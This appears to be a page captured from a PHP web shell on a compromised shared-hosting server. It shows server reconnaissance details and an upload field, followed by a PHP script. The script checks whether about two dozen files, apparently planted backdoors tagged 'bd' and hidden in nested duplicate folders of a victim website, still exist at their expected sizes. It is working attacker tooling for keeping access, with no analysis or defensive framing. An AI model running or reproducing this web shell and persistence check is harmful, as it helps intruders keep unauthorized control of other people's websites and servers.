| Server IP : 198.54.126.135 / Your IP : 216.73.216.217 Web Server : Apache System : Linux host11.registrar-servers.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : linearpo ( 12988) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /dev/shm/ |
Upload File : |
<?php $r = '/home/texturadigitals/public_html'; $x = ["/website-development/website-development/index.php"=>"bd@@179868@@98",
"/media/media/media/media/cache.php"=>"bd@@276755@@5",
"/book-publishing/book-publishing/cache.php"=>"bd@@257611@@98",
"/get-a-quote/get-a-quote/get-a-quote/cache.php"=>"bd@@270295@@76",
"/span.php"=>"bd@@118370@@6298",
"/imdex.php"=>"bd@@117860@@7817",
"/portfolio/portfolio/portfolio/index.php"=>"bd@@276663@@61",
"/contact/contact/contact/contact/contact/index.php"=>"bd@@260459@@84",
"/get-a-quote/get-a-quote/index.php"=>"bd@@257656@@11",
"/privacy-policy/privacy-policy/cache.php"=>"bd@@260478@@31",
"/assets/images/portfolios/abstract/abstract/index.php"=>"bd@@260485@@90",
"/video-animation/video-animation/video-animation/index.php"=>"bd@@257671@@71",
"/txets.php"=>"bd@@257690@@62",
"/portfolio/portfolio/portfolio/cache.php"=>"bd@@260510@@93",
"/images/images/images/index.php"=>"bd@@179877@@40",
"/media/media/index.php"=>"bd@@260517@@94",
"/assets/images/portfolios/video/video/index.php"=>"bd@@179883@@49",
"/assets/css/fonts/fonts/index.php"=>"bd@@270254@@62",
"/book-and-magazine/book-and-magazine/cache.php"=>"bd@@179888@@48",
"/packaging-and-label/packaging-and-label/cache.php"=>"bd@@179893@@7",
"/images/images/index.php"=>"bd@@270266@@56",
"/app-design-and-development/app-design-and-development/cache.php"=>"bd@@256705@@90",
"/contact/contact/contact/contact/index.php"=>"bd@@270281@@21",
"/merchandise/merchandise/cache.php"=>"bd@@256713@@9",
"/images/images/cache.php"=>"bd@@270308@@49"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');